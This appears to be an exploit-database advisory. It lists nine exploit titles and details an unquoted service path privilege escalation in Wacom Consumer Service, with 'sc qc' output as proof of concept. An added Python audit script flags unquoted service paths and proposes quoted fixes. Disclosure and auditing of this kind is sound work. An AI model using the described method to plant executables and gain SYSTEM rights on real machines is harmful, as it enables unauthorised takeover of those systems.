
9 new exploits

ShoreTel Connect ONSITE - Blind SQL Injection
Leap Service - Unquoted Service Path Privilege Escalation
Wacom Consumer Service - Unquoted Service Path Privilege Escalation
Foxit Cloud Update Service - Unquoted Service Path Privilege Escalation
Apache Tomcat 8/7/6 (RedHat-Based Distros) - Privilege Escalation
Linux Kernel 4.6.2 (Ubuntu 16.04.1) - IP6T_SO_SET_REPLACE Privilege Escalation
Zend Studio IDE 13.5.1 - Insecure File Permissions Privilege Escalation
HP Client - Automation Command Injection / Remote Code Execution
Maian Weblog 4.0 - Cross-Site Request Forgery (Add New Post)

Wacom Consumer Service: http://www.wacom.com
By Ross Marks: http://www.rossmarks.co.uk
Exploit-db: https://www.exploit-db.com/author/?a=8724
Category: Local
Tested on: Windows 10 x86/x64

1) Unquoted Service Path Privilege Escalation

Wacom's "Wacom Consumer Service" installs as a service with an unquoted service path and runs with SYSTEM privileges.
This could potentially allow an authorized but non-privileged local user to execute arbitrary code with elevated privileges on the system.

A successful attempt requires the local attacker to insert an executable file in the path of the service.
Upon service restart or system reboot, the malicious code will be run with elevated privileges.

PoC:

C:\>sc qc WTabletServiceCon
[SC] QueryServiceConfig SUCCESS

SERVICE_NAME: WTabletServiceCon
        TYPE               : 10  WIN32_OWN_PROCESS
        START_TYPE         : 2   AUTO_START
        ERROR_CONTROL      : 1   NORMAL
        BINARY_PATH_NAME   : C:\Program Files\Tablet\Pen\WtabletServiceCon.exe
        LOAD_ORDER_GROUP   :
        TAG                : 0
        DISPLAY_NAME       : Wacom Consumer Service
        DEPENDENCIES       :
        SERVICE_START_NAME : LocalSystem
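
Added example (not part of the original advisory): a Python audit that parses saved `sc qc` output and flags services whose executable path is unquoted and contains a space, returning the quoted form to set as the fix. The sample input is constructed; the `ExampleQuoted` and `ExampleNoSpace` services and the function names are hypothetical.

```python
import re

# Constructed sample: the advisory's service plus two constructed services
# (quoted path; unquoted path whose only spaces are in the arguments).
SAMPLE = r"""
SERVICE_NAME: WTabletServiceCon
        BINARY_PATH_NAME   : C:\Program Files\Tablet\Pen\WtabletServiceCon.exe
        SERVICE_START_NAME : LocalSystem

SERVICE_NAME: ExampleQuoted
        BINARY_PATH_NAME   : "C:\Program Files\Example\svc.exe" --run
        SERVICE_START_NAME : LocalSystem

SERVICE_NAME: ExampleNoSpace
        BINARY_PATH_NAME   : C:\Windows\system32\svchost.exe -k netsvcs
        SERVICE_START_NAME : LocalSystem
"""

FIELD = re.compile(
    r"^\s*(SERVICE_NAME|BINARY_PATH_NAME|SERVICE_START_NAME)\s*:\s*(.*?)\s*$")
# Executable part of an unquoted command line: up to the first ".exe" token.
EXE = re.compile(r"^(.*?\.exe)(?=\s|$)", re.IGNORECASE)

def parse_services(text):
    """Return one dict per service found in concatenated `sc qc` output."""
    services = []
    for line in text.splitlines():
        m = FIELD.match(line)
        if not m:
            continue
        key, value = m.groups()
        if key == "SERVICE_NAME":
            services.append({})
        if services:
            services[-1][key] = value
    return services

def audit(text):
    """Flag services whose executable path is unquoted and contains a space."""
    findings = []
    for svc in parse_services(text):
        path = svc.get("BINARY_PATH_NAME", "")
        m = EXE.match(path)
        # Quoted paths and space-free executable paths are not ambiguous.
        if path.startswith('"') or not m or " " not in m.group(1):
            continue
        findings.append({"service": svc["SERVICE_NAME"],
                         "account": svc.get("SERVICE_START_NAME", ""),
                         "quoted": f'"{m.group(1)}"{path[m.end():]}'})
    return findings
```

The `quoted` value is the binary path to set on the service (for example with `sc config <service> binPath= ...`); directories along a flagged path should also be checked for write access by non-administrators.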